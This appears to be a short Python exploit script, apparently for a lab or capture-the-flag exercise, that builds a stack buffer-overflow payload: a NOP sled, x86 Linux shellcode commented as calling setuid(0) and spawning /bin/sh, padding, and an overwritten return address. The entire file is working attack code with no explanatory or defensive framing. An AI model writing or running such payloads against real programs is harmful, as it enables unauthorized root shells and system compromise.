#!/bin/python

nops= b'\x90' * 64
shellcode = (
    b'\x31\xc0\x89\xc3\xb0\x17\xcd\x80'  # setuid(0)
    b'\x31\xd2\x52\x68\x6e\x2f\x73\x68'  # push "//sh"
    b'\x68\x2f\x2f\x62\x69\x89\xe3\x52'  # push "/bin"
    b'\x53\x89\xe1\x8d\x42\x0b\xcd\x80'  # execve("/bin/sh")
)
padding = b'A' * (110 - len(nops) - len(shellcode))
eip = b'\x40\xd4\xff\xff'
print (nops+shellcode+padding+eip)
